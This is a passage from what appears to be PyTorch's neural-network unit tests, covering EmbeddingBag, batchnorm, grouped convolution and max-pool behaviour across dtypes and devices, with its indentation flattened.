@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_EmbeddingBag_per_sample_weights_and_offsets(self, device, dtypes):
def test_per_sample_weights(mode, trainable_scale):
es = nn.EmbeddingBag(5, 2, mode=mode).to(dtype=dtypes[2], device=device)
es.weight.data.copy_(
torch.arange(1, 11, device=device, dtype=dtypes[2]).view_as(es.weight))
input = torch.tensor([3, 1, 1, 1, 4, 0], device=device, dtype=dtypes[0])
offsets = torch.tensor([0, 0, 3, 3, 6], device=device, dtype=dtypes[1])
per_sample_weights = torch.randn_like(input, dtype=dtypes[2]) \
.requires_grad_(trainable_scale)
ref_per_sample_weights = \
per_sample_weights.detach().requires_grad_(trainable_scale)
reference_weights = es.weight.detach().requires_grad_()
expected = self._embedding_bag_reference_impl(
input, reference_weights, offsets, mode, ref_per_sample_weights)
result = es(input, offsets, per_sample_weights)
self.assertEqual(result, expected, atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
grad = torch.randn_like(expected).to(dtype=dtypes[2], device=device)
result.backward(grad)
expected.backward(grad)
self.assertEqual(es.weight.grad, reference_weights.grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
if trainable_scale:
self.assertEqual(per_sample_weights.grad, ref_per_sample_weights.grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
modes = ('sum',)
trainable_scale = (True, False)
for mode, trainable in itertools.product(modes, trainable_scale):
test_per_sample_weights(mode, trainable)
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_EmbeddingBag_per_sample_weights_and_new_offsets(self, device, dtypes):
def test_per_sample_weights_new_offsets(mode, trainable_scale, include_last_offset, has_weight=True):
es = nn.EmbeddingBag(5, 2, mode=mode, include_last_offset=include_last_offset).to(dtype=dtypes[2], device=device)
es.weight.data.copy_(
torch.arange(1, 11, device=device, dtype=dtypes[2]).view_as(es.weight))
input = torch.tensor([3, 1, 1, 1, 4, 0], device=device, dtype=dtypes[0])
offsets = torch.tensor([0, 0, 3, 3, 6], device=device, dtype=dtypes[1])
if include_last_offset:
offsets = torch.cat((offsets, torch.tensor([input.size(0)], device=device, dtype=dtypes[1])), 0)
if has_weight:
per_sample_weights = torch.randn_like(input, device=device, dtype=dtypes[2]) \
.requires_grad_(trainable_scale)
ref_per_sample_weights = \
per_sample_weights.detach().requires_grad_(trainable_scale)
else:
per_sample_weights = None
ref_per_sample_weights = None
reference_weights = es.weight.detach().requires_grad_()
expected = self._embedding_bag_reference_impl(
input, reference_weights, offsets, mode, ref_per_sample_weights, include_last_offset)
result = es(input, offsets, per_sample_weights)
self.assertEqual(result, expected, atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
grad = torch.randn_like(expected)
result.backward(grad)
expected.backward(grad)
self.assertEqual(es.weight.grad, reference_weights.grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
if has_weight and trainable_scale:
self.assertEqual(per_sample_weights.grad, ref_per_sample_weights.grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
trainable_scale = (True, False)
include_last_offset = (True, False)
modes = (('sum', False), ('sum', True), ('max', False), ('mean', False))
for (mode, has_weight), trainable, include_last_offset in itertools.product(
modes, trainable_scale, include_last_offset
):
test_per_sample_weights_new_offsets(
mode, trainable, include_last_offset, has_weight
)
def _test_EmbeddingBag_vs_Embedding(self, N, D, B, L, max_norm=None,
mode='mean',
device='cpu',
wdtype=torch.float,
dtype=torch.long,
test_per_sample_weights=False,
trainable_per_sample_weights=False,
sparse=False,
test_backward=True,
backward_prec=None):
es = nn.EmbeddingBag(N, D, mode=mode, sparse=sparse, max_norm=max_norm).to(device, wdtype)
e = nn.Embedding(N, D, max_norm=max_norm).to(device, wdtype)
e.weight.data.copy_(es.weight)
input = torch.randint(N, (B, L), device=device, dtype=dtype)
offsets = torch.arange(0, B, device=device, dtype=dtype).mul_(L)
grad_output = torch.rand(B, D, device=device, dtype=wdtype)
if test_per_sample_weights:
# To prevent large gradients, weights should sum to 1 for each bag
per_sample_weights = \
torch.randn(B, L, device=device, dtype=wdtype).softmax(dim=-1)
per_sample_weights_reference = \
per_sample_weights.clone().requires_grad_(trainable_per_sample_weights)
per_sample_weights.requires_grad_(trainable_per_sample_weights)
output = es(input.view(-1), offsets, per_sample_weights.view(-1))
else:
output = es(input.view(-1), offsets)
per_sample_weights = None
per_sample_weights_reference = None
if mode == 'sum':
if test_per_sample_weights:
ref_output = (e(input) * per_sample_weights_reference.unsqueeze(-1)).sum(1)
else:
ref_output = e(input).sum(1)
elif mode == 'mean':
assert not test_per_sample_weights
ref_output = e(input).mean(1)
elif mode == 'max':
assert not test_per_sample_weights
ref_output = e(input).max(1)[0]
self.assertEqual(output, ref_output, atol=dtype2prec_DONTUSE[wdtype], rtol=0)
if not test_backward:
return
output.backward(grad_output)
ref_output.backward(grad_output)
es_weight_grad = es.weight.grad.data
if sparse:
es_weight_grad = es.weight.grad.data.to_dense()
# We have more floating point error here because we are dealing with larger numbers
if backward_prec is None:
needed_prec = dtype2prec_DONTUSE[wdtype] * 5
else:
needed_prec = backward_prec
self.assertEqual(es_weight_grad, e.weight.grad, atol=needed_prec, rtol=0)
if test_per_sample_weights and trainable_per_sample_weights:
self.assertEqual(per_sample_weights.grad, per_sample_weights_reference.grad,
atol=dtype2prec_DONTUSE[wdtype], rtol=0)
@skipCUDAIf(True, "Temporarily disabled. See t54369166")
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.half, torch.float, torch.double)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.float, torch.double)))
def test_EmbeddingBag_per_sample_weights_and_no_offsets(self, device, dtypes):
def run_tests(mode, sparse, trainable_per_sample_weights):
kwargs = dict(test_per_sample_weights=True, device=device,
mode=mode, wdtype=dtypes[1], dtype=dtypes[0], sparse=sparse,
trainable_per_sample_weights=trainable_per_sample_weights)
# Simple case
self._test_EmbeddingBag_vs_Embedding(2, 3, 5, 7, **kwargs)
# B * L > 1000
self._test_EmbeddingBag_vs_Embedding(2, 5, 53, 23, **kwargs)
# Large num_embedding
self._test_EmbeddingBag_vs_Embedding(101, 5, 3, 7, **kwargs)
# Large embedding_dim
self._test_EmbeddingBag_vs_Embedding(2, 101, 3, 7, **kwargs)
modes = ('sum',)
sparsity = (True, False)
trainable_scale = (True, False)
for mode, sparse, trainable_per_sample_weights in \
itertools.product(modes, sparsity, trainable_scale):
run_tests(mode, sparse, trainable_per_sample_weights)
# Test CUDA Dense on half precision
if device == 'cuda':
modes = ('sum',)
sparsity = (False,)
trainable_scale = (True, False)
for mode, sparse, trainable_per_sample_weights in \
itertools.product(modes, sparsity, trainable_scale):
run_tests(mode, sparse, trainable_per_sample_weights)
def _test_EmbeddingBag(
self,
device,
mode,
sparse,
wdtype=torch.double,
dtype=torch.long,
odtype=torch.long,
test_backward=True,
):
# check a known test example
es = nn.EmbeddingBag(5, 2, mode=mode, sparse=sparse).to(device, wdtype)
es.weight.data.copy_(torch.arange(1, 11, device=device, dtype=wdtype).view_as(es.weight))
input = torch.tensor([3, 1, 1, 1, 4, 0], device=device, dtype=dtype)
offsets = torch.tensor([0, 0, 3, 3, 6], device=device, dtype=odtype)
grad_output = torch.tensor(
[1, 2,
3, 4], device=device, dtype=wdtype).view(2, 2)
grad_output_with_empty = torch.tensor(
[99, 99,
1, 2,
99, 99,
3, 4,
99, 99], device=device, dtype=wdtype).view(5, 2)
if mode == "sum" or mode == "mean":
denominator = 1 if mode == "sum" else 3
expected_output = torch.tensor(
[[13, 16],
[13, 16]], device=device, dtype=wdtype) / denominator
expected_output_with_empty = torch.tensor(
[[0, 0],
[13, 16],
[0, 0],
[13, 16],
[0, 0]], device=device, dtype=wdtype) / denominator
expected_grad_weight = torch.tensor(
[[3, 4],
[5, 8],
[0, 0],
[1, 2],
[3, 4]], device=device, dtype=wdtype) / denominator
elif mode == "max":
expected_output = torch.tensor(
[[7, 8],
[9, 10]], device=device, dtype=wdtype)
expected_output_with_empty = torch.tensor(
[[0, 0],
[7, 8],
[0, 0],
[9, 10],
[0, 0]], device=device, dtype=wdtype)
expected_grad_weight = torch.tensor(
[[0, 0],
[0, 0],
[0, 0],
[1, 2],
[3, 4]], device=device, dtype=wdtype)
output = es(input, offsets)
output.backward(grad_output_with_empty)
es_weight_grad = es.weight.grad.data
if sparse:
es_weight_grad = es.weight.grad.to_dense()
self.assertEqual(output, expected_output_with_empty)
self.assertEqual(es_weight_grad, expected_grad_weight, atol=dtype2prec_DONTUSE[wdtype], rtol=0)
# check same example except as 2D (2 x 3)
input = input.view(2, -1)
es.zero_grad()
output = es(input)
output.backward(grad_output)
es_weight_grad = es.weight.grad
if sparse:
es_weight_grad = es.weight.grad.to_dense()
self.assertEqual(output, expected_output)
self.assertEqual(es_weight_grad, expected_grad_weight, atol=dtype2prec_DONTUSE[wdtype], rtol=0)
# test all empty bags
es.zero_grad()
inputs = torch.tensor([], dtype=dtype, device=device)
offsets = torch.tensor([0, 0, 0, 0], dtype=odtype, device=device)
es(inputs, offsets).sum().backward()
dense_grad = es.weight.grad
if dense_grad.is_sparse:
dense_grad = dense_grad.to_dense()
self.assertEqual(dense_grad, torch.zeros_like(es.weight))
# now compare EmbeddingBag vs Embedding + Sum/Mean, for constant bag length
N, D, B, L = random.randint(1, 100), random.randint(1, 100), random.randint(1, 50), random.randint(1, 50)
kwargs = dict(mode=mode, sparse=sparse, device=device, wdtype=wdtype, dtype=dtype, test_backward=test_backward)
self._test_EmbeddingBag_vs_Embedding(N, D, B, L, **kwargs)
for max_norm in (None, 3):
for p in itertools.product([1, 2], repeat=4):
self._test_EmbeddingBag_vs_Embedding(*p, max_norm=max_norm, **kwargs)
# check that giving illegal input combos raises error
es = nn.EmbeddingBag(10, 20, mode=mode, sparse=sparse)
input = torch.ones(3, 4, dtype=dtype)
offset = torch.arange(0, 3, dtype=odtype)
self.assertRaises(ValueError, lambda: es(input, offset))
self.assertRaises(ValueError, lambda: es(input.view(-1)))
offset[0] = 1
if self.device_type == "cpu":
self.assertRaises(RuntimeError, lambda: es(input.view(-1), offset))
offset[0] = 0
offset[-1] = 100
self.assertRaises(RuntimeError, lambda: es(input.view(-1), offset))
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_embedding_bag_device(self, device, dtypes):
self._test_EmbeddingBag(device, 'sum', False, wdtype=dtypes[2], dtype=dtypes[0], odtype=dtypes[1])
self._test_EmbeddingBag(device, 'mean', False, wdtype=dtypes[2], dtype=dtypes[0], odtype=dtypes[1])
self._test_EmbeddingBag(device, 'max', False, wdtype=dtypes[2], dtype=dtypes[0], odtype=dtypes[1])
test_backward = False
if self.device_type == 'cuda':
# see 'todo' in test_embedding_bag.
test_backward = dtypes[2] is not torch.float16
elif self.device_type == 'cpu':
# TODO: figure out why precision on sparse embeddings isn't the
# same as for dense.
test_backward = dtypes[2] is not torch.float
self._test_EmbeddingBag(
device,
'sum',
True,
wdtype=dtypes[2],
dtype=dtypes[0],
odtype=dtypes[1],
test_backward=test_backward,
)
self._test_EmbeddingBag(
device,
'mean',
True,
wdtype=dtypes[2],
dtype=dtypes[0],
odtype=dtypes[1],
test_backward=test_backward,
)
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_embedding_bag_non_contiguous_weight(self, device, dtypes):
weight_tensor = torch.randn(3, 4, dtype=dtypes[2], device=device)
weight_tensor_non_contig = weight_tensor[:, :3] # This is non-contiguous strided.
weight_tensor_contig = weight_tensor_non_contig.clone().contiguous() # Contig-strided.
index = torch.tensor([0, 1, 2], dtype=dtypes[0], device=device)
offsets = torch.tensor([0, 2], dtype=dtypes[1], device=device)
for mode in ['sum', 'mean', 'max']:
output_non_contig = F.embedding_bag(
input=index,
weight=weight_tensor_non_contig,
offsets=offsets,
mode=mode,
)
output_contig = F.embedding_bag(
input=index,
weight=weight_tensor_contig,
offsets=offsets,
mode=mode,
)
self.assertEqual(output_non_contig, output_contig)
@onlyCUDA
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long)))
def test_embedding_bag_bfloat16(self, device, dtypes):
self._test_EmbeddingBag(device, 'sum', True, wdtype=torch.bfloat16, dtype=dtypes[0], odtype=dtypes[1], test_backward=True)
self._test_EmbeddingBag(device, 'mean', True, wdtype=torch.bfloat16, dtype=dtypes[0], odtype=dtypes[1], test_backward=True)
@onlyCUDA
@dtypes(torch.half, torch.float, torch.double)
def test_multihead_attention_dtype(self, device, dtype):
embed_dim = 128
num_heads = 8
sl = 10
bs = 8
model = nn.MultiheadAttention(embed_dim, num_heads).cuda().to(dtype)
q = torch.randn(sl, bs, embed_dim, device=device, dtype=dtype)
k = torch.randn(sl, bs, embed_dim, device=device, dtype=dtype)
v = torch.randn(sl, bs, embed_dim, device=device, dtype=dtype)
out = model(q, k, v)
self.assertEqual(q.size(), out[0].size())
self.assertEqual(dtype, out[0].dtype)
@dtypesIfCUDA(*get_all_fp_dtypes(include_bfloat16=AMPERE_OR_ROCM))
@dtypes(torch.float)
def test_Conv2d_naive_groups(self, device, dtype):
# Check that grouped convolutions matches two half convolutions
m = nn.Conv2d(4, 4, kernel_size=3, groups=2).to(device, dtype)
i = torch.randn(2, 4, 6, 6, device=device, dtype=dtype, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 4, 4, 4, device=device, dtype=dtype)
output.backward(grad_output)
m1 = nn.Conv2d(2, 2, kernel_size=3).to(device, dtype)
m1.weight.data.copy_(m.weight.data[:2])
m1.bias.data.copy_(m.bias.data[:2])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :2].contiguous())
m2 = nn.Conv2d(2, 2, kernel_size=3).to(device, dtype)
m2.weight.data.copy_(m.weight.data[2:])
m2.bias.data.copy_(m.bias.data[2:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 2:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.bias.grad.data,
torch.cat([m1.bias.grad.data, m2.bias.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
@dtypes(torch.double)
def test_Conv2d_backward_depthwise(self, device, dtype):
x = torch.randn(2, 2, 4, 20, device=device, dtype=dtype, requires_grad=True)
weight = torch.randn(2, 1, 3, 5, device=device, dtype=dtype, requires_grad=True)
def conv2d_depthwise(x, weight):
return torch.nn.functional.conv2d(
x, weight, bias=None, stride=(1, 10), groups=2)
for cudnn_enabled in [False, True]:
with torch.backends.cudnn.flags(enabled=cudnn_enabled):
torch.autograd.gradcheck(conv2d_depthwise, (x, weight))
def _test_batchnorm_grad(self, device, dtype=torch.double):
bs, n_feat, size_feat = 4, 5, 6
input = torch.arange(bs * n_feat * size_feat, device=device,
requires_grad=True, dtype=dtype).view(bs, n_feat, size_feat)
weight = torch.arange(1, n_feat + 1, device=device, requires_grad=True, dtype=dtype)
bias = torch.arange(n_feat, device=device, requires_grad=True, dtype=dtype)
running_mean = 1 - torch.arange(n_feat, device=device, dtype=dtype)
running_var = 2 * torch.arange(n_feat, device=device, dtype=dtype)
for training in [False, True]:
_assertGradAndGradgradChecks(self, F.batch_norm, (input, running_mean, running_var, weight, bias,
training, 0.1, 0.0001))
def test_batchnorm_grad(self, device):
self._test_batchnorm_grad(device)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_grad(device)
def test_hardsigmoid_grad(self, device):
inputs = (torch.randn(4, 16, 16, device=device) - 0.5) * 10
inputs.requires_grad = True
self.assertTrue(gradcheck(F.hardsigmoid, (inputs,)))
# currently fails on XLA
@onlyOnCPUAndCUDA
def test_hardswish_grad(self, device):
inputs = (torch.randn(4, 16, 16, device=device) - 0.5) * 10
inputs.requires_grad = True
self.assertTrue(gradcheck(F.hardswish, (inputs,)))
def _test_batchnorm_eval(self, ndim, device, dtype, module_dtype=None):
module_dtype = module_dtype or dtype
module = nn.BatchNorm1d(3).to(device, module_dtype)
module.eval()
data = torch.rand([3] * ndim, device=device, dtype=dtype, requires_grad=True)
grad = torch.rand([3] * ndim, device=device, dtype=dtype)
# 1st pass
res1 = module(data)
res1.backward(grad)
grad1 = data.grad.clone()
# 2nd pass
if data.grad is not None:
data.grad.data.zero_()
res2 = module(data)
res2.backward(grad)
grad2 = data.grad.clone()
self.assertEqual(res1, res2)
self.assertEqual(grad1, grad2)
# track_running_stats=False
module = nn.BatchNorm1d(3, track_running_stats=False).to(device, module_dtype)
data = torch.rand(4, 3, device=device, dtype=dtype, requires_grad=True)
grad = torch.rand(4, 3, device=device, dtype=dtype)
# 1st pass
res1 = module(data)
res1.backward(grad)
grad1 = data.grad.clone()
# set eval
module.eval()
# 2nd pass
if data.grad is not None:
data.grad.data.zero_()
res2 = module(data)
res2.backward(grad)
grad2 = data.grad.clone()
self.assertEqual(res1, res2)
self.assertEqual(grad1, grad2)
@dtypes(torch.float)
@dtypesIfCUDA(torch.float, torch.bfloat16)
def test_batchnorm_eval(self, device, dtype):
self._test_batchnorm_eval(2, device, dtype)
self._test_batchnorm_eval(3, device, dtype)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_eval(2, device, dtype)
self._test_batchnorm_eval(3, device, dtype)
@onlyCUDA
@dtypes(torch.bfloat16, torch.half)
def test_batchnorm_eval_mixed(self, device, dtype):
# Test bfloat16 input with float module
self._test_batchnorm_eval(2, device, dtype, torch.float)
self._test_batchnorm_eval(3, device, dtype, torch.float)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_eval(2, device, dtype, torch.float)
self._test_batchnorm_eval(3, device, dtype, torch.float)
def _test_batchnorm_affine(self, ndim, device, dtype, module_dtype=None):
# Compare affine against no-op weights and bias
module_dtype = module_dtype or dtype
module = nn.BatchNorm1d(3, affine=False).to(device, module_dtype)
module_affine = nn.BatchNorm1d(3, affine=True).to(device, module_dtype)
with torch.no_grad():
module_affine.weight.fill_(1.0)
module_affine.bias.zero_()
data = torch.rand([3] * ndim, device=device, dtype=dtype, requires_grad=True)
grad = torch.ones_like(data, requires_grad=False)
# With weights all ones and bias all zeros
res1 = module_affine(data)
res1.backward(grad)
grad1 = data.grad.clone()
data.grad.zero_()
# Without any weights or bias
res2 = module(data)
res2.backward(grad)
grad2 = data.grad
self.assertEqual(res1, res2)
self.assertEqual(grad1, grad2)
@dtypes(torch.float)
@dtypesIfCUDA(torch.float, torch.bfloat16)
def test_batchnorm_affine(self, device, dtype):
self._test_batchnorm_affine(2, device, dtype)
self._test_batchnorm_affine(3, device, dtype)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_affine(2, device, dtype)
self._test_batchnorm_affine(3, device, dtype)
@onlyCUDA
@dtypes(torch.bfloat16, torch.half)
def test_batchnorm_affine_mixed(self, device, dtype):
cudnn_enabled = [False]
if self.device_type == 'cuda' and self.has_cudnn():
# TODO: Test fails with cudnn, see gh-62034
# cudnn_enabled = [False, True]
pass
# Test bfloat16 input with float module
for enabled in cudnn_enabled:
with torch.backends.cudnn.flags(enabled=enabled):
self._test_batchnorm_affine(2, device, dtype, torch.float)
self._test_batchnorm_affine(3, device, dtype, torch.float)
def _test_batchnorm_simple_average(self, device, dtype, module_dtype=None):
module_dtype = module_dtype or dtype
module = nn.BatchNorm1d(3, momentum=None).to(dtype=module_dtype, device=device)
zeros = torch.zeros(3, dtype=module_dtype, device=device)
ones = torch.ones(3, dtype=module_dtype, device=device)
self.assertEqual(module.running_mean, zeros)
self.assertEqual(module.running_var, ones)
data1 = torch.rand(4, 3, dtype=dtype, device=device)
data2 = torch.rand(4, 3, dtype=dtype, device=device)
# 1st pass
res1 = module(data1)
running_mean1 = module.running_mean.clone()
running_var1 = module.running_var.clone()
self.assertNotEqual(running_mean1, zeros)
self.assertNotEqual(running_var1, ones)
# reset stats
module.reset_running_stats()
self.assertEqual(module.running_mean, zeros)
self.assertEqual(module.running_var, ones)
# 2nd pass
res2 = module(data2)
running_mean2 = module.running_mean.clone()
running_var2 = module.running_var.clone()
self.assertNotEqual(running_mean2, zeros)
self.assertNotEqual(running_var2, ones)
# reset stats
module.reset_running_stats()
self.assertEqual(module.running_mean, zeros)
self.assertEqual(module.running_var, ones)
# 3rd (combined) pass
res3 = module(data1)
res4 = module(data2)
self.assertEqual(res3, res1)
self.assertEqual(res4, res2)
self.assertEqual(module.running_mean, (running_mean1 + running_mean2) / 2)
self.assertEqual(module.running_var, (running_var1 + running_var2) / 2)
@dtypes(torch.float)
@dtypesIfCUDA(torch.float, torch.bfloat16)
def test_batchnorm_simple_average(self, device, dtype):
self._test_batchnorm_simple_average(device, dtype)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_simple_average(device, dtype)
@onlyCUDA
@dtypes(torch.bfloat16, torch.half)
def test_batchnorm_simple_average_mixed(self, device, dtype):
self._test_batchnorm_simple_average(device, dtype, torch.float)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_simple_average(device, dtype, torch.float)
def _test_maxpool_indices(self, num_dim, adaptive=False, device="cpu", dtype=torch.float):
def expected_indices(dim):
if dim == 1:
return torch.tensor([1, 3], dtype=torch.double).repeat(2, 2, 1)
if dim == 2:
return torch.tensor([[5, 7], [13, 15]], dtype=torch.double).repeat(2, 2, 1, 1)
def expected_grad(dim):
if dim == 1:
return torch.tensor([0, 1, 0, 1], dtype=torch.double).repeat(2, 2, 1)
grad = expected_grad(dim - 1)
zero = torch.zeros(grad.size())
return torch.stack((zero, grad, zero, grad), 2)
def expected_output(dim):
if dim == 1:
return torch.arange(2, 17, 2).view(2, 2, 2)
if dim == 2:
col = torch.arange(6, 63, 8)
return torch.stack([col, col + 2], 1).view(2, 2, 2, 2)
if adaptive:
cls_name = 'AdaptiveMaxPool{}d'.format(num_dim)
else:
cls_name = 'MaxPool{}d'.format(num_dim)
module_cls = getattr(nn, cls_name)
module = module_cls(2, return_indices=True).to(device, dtype=dtype)
numel = 4 ** (num_dim + 1)
input = torch.arange(1, numel + 1).view(2, 2, *repeat(4, num_dim)).to(device, dtype=dtype)
input_var = input.clone().detach().requires_grad_()
# Check forward
output, indices = module(input_var)
if num_dim != 3:
expected_indices = expected_indices(num_dim)
expected_output = expected_output(num_dim)
self.assertEqual(indices.dim(), input.dim())
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(indices.data.squeeze(), expected_indices)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output.data.squeeze(), expected_output)
self.assertTrue(output.requires_grad)
self.assertFalse(indices.requires_grad)
# Make sure backward works
grad_output = torch.ones(output.size(), device=device, dtype=dtype)
output.backward(grad_output, retain_graph=True)
expected_grad = expected_grad(num_dim)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(input_var.grad.data, expected_grad.view_as(input))
# Make sure backward after changing indices will result in an error
indices.add_(1)
self.assertRaises(RuntimeError, lambda: output.backward(grad_output))
# Make sure -Infinity is handled correctly
t = torch.tensor([[[float("-inf")]]])
m = nn.MaxPool1d(kernel_size=1, return_indices=True)
output, indices = m(t)
self.assertEqual(output[0, 0, 0], float("-inf"))
self.assertEqual(indices[0, 0, 0], 0)
t = torch.tensor([[[float("-inf")]]])
m = nn.MaxPool2d(kernel_size=1, return_indices=True)
output, indices = m(t)
self.assertEqual(output[0, 0, 0], float("-inf"))
self.assertEqual(indices[0, 0, 0], 0)
t = torch.tensor([[[[float("-inf")]]]])
m = nn.MaxPool3d(kernel_size=1, return_indices=True)
output, indices = m(t)
self.assertEqual(output[0, 0, 0, 0], float("-inf"))
self.assertEqual(indices[0, 0, 0, 0], 0)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_MaxPool1d_indices(self, device, dtype):
self._test_maxpool_indices(1, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_MaxPool2d_indices(self, device, dtype):
self._test_maxpool_indices(2, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_MaxPool3d_indices(self, device, dtype):
self._test_maxpool_indices(3, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_AdaptiveMaxPool1d_indices(self, device, dtype):
self._test_maxpool_indices(1, adaptive=True, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_AdaptiveMaxPool2d_indices(self, device, dtype):
self._test_maxpool_indices(2, adaptive=True, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_AdaptiveMaxPool3d_indices(self, device, dtype):
self._test_maxpool_indices(3, adaptive=True, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_maxpool_indices_no_batch_dim(self, device, dtype):
"""Check that indices with no batch dim is consistent with a single batch."""
max_pool_cases = [
(nn.MaxPool1d(3, return_indices=True),
torch.randn(3, 5, device=device, dtype=dtype)),
(nn.MaxPool2d(3, return_indices=True),
torch.randn(3, 5, 6, device=device, dtype=dtype)),
(nn.MaxPool3d(3, return_indices=True),
torch.randn(3, 5, 6, 7, device=device, dtype=dtype)),
(nn.AdaptiveMaxPool1d(3, return_indices=True),
torch.randn(3, 5, device=device, dtype=dtype)),
(nn.AdaptiveMaxPool2d(3, return_indices=True),
torch.randn(3, 5, 6, device=device, dtype=dtype)),
(nn.AdaptiveMaxPool3d(3, return_indices=True),
torch.randn(3, 5, 6, 7, device=device, dtype=dtype))]
for module, input in max_pool_cases:
_, indices_no_batch = module(input)
_, indicies_single_batch = module(input.unsqueeze(0))
self.assertEqual(indices_no_batch, indicies_single_batch.squeeze(0))
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float)
@onlyOnCPUAndCUDA # TODO: Fails on XLA
def test_max_pool_nan_inf(self, device, dtype):
for adaptive in ['', 'adaptive_']:
for num_dim in [1, 2, 3]:
fn_name = '{}max_pool{}d'.format(adaptive, num_dim)
fn = getattr(F, fn_name)
x = torch.full([1, 1] + num_dim * [3], nan, device=device, dtype=dtype, requires_grad=True)
res = fn(x, 1 if adaptive else 3)
res.backward(torch.randn_like(res))
self.assertTrue(math.isnan(res.item()))
x.requires_grad_(False)
res = fn(x, 1 if adaptive else 3)
self.assertTrue(math.isnan(res.item()))
x2 = torch.full([1, 1] + num_dim * [3], -inf, device=device, dtype=dtype, requires_grad=True)
res2 = fn(x2, 1 if adaptive else 3)
res2.backward(torch.randn_like(res2))
self.assertTrue(math.isinf(res2.item()))
x2.requires_grad_(False)
res2 = fn(x2, 1 if adaptive else 3)
self.assertTrue(math.isinf(res2.item()))
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
def test_grid_sample_nan_inf(self, device, dtype):
input = torch.zeros([1, 1, 3, 3], device=device, dtype=dtype)
grid = torch.tensor([[[[nan, 0], [0, inf]]]], device=device, dtype=dtype)
for padding_mode in ('reflection', 'border', 'zeros'):
sample = torch.nn.functional.grid_sample(input=input, grid=grid, mode='nearest',
padding_mode=padding_mode, align_corners=False)
self.assertEqual(sample, torch.zeros([1, 1, 1, 2], device=device, dtype=dtype))
@onlyOnCPUAndCUDA
def test_fractional_max_pool2d(self, device):
x = torch.randn(1, 2, 7, 7, requires_grad=True, device=device)
samples = x.new(1, 2, 2).uniform_()
def func(x):
return F.fractional_max_pool2d(
x, (2, 2), output_size=(3, 3), _random_samples=samples)
self.assertEqual(func(x).shape, (1, 2, 3, 3))
gradcheck(func, [x])
gradgradcheck(func, [x])
x = torch.randn(2, 7, 7, requires_grad=True, device=device)
self.assertEqual(func(x).shape, (2, 3, 3))
if self.device_type != 'cuda':
# Reference: https://github.com/pytorch/pytorch/issues/52427
# Raises -> RuntimeError: TensorAccessor expected 4 dims but tensor has 3
# on CUDA in gradcheck
gradcheck(func, [x])
gradgradcheck(func, [x])
for kernel_size in [(), (1,)]:
with self.assertRaisesRegex(RuntimeError, "kernel_size must either"):
# Incorrect kernel_size
F.fractional_max_pool2d(x, kernel_size=kernel_size, output_size=(3, 3), _random_samples=samples)
err_large_msg = "too large relative to input "
err_out_size_msg = "output_size must either"
for output_size, msg in [((9, 3), err_large_msg + "height"),
((3, 9), err_large_msg + "width"),
((3,), err_out_size_msg),
((), err_out_size_msg)]:
with self.assertRaisesRegex(RuntimeError, msg):
# Incorrect output_size
F.fractional_max_pool2d(x, (2, 2), output_size=output_size, _random_samples=samples)
@onlyOnCPUAndCUDA
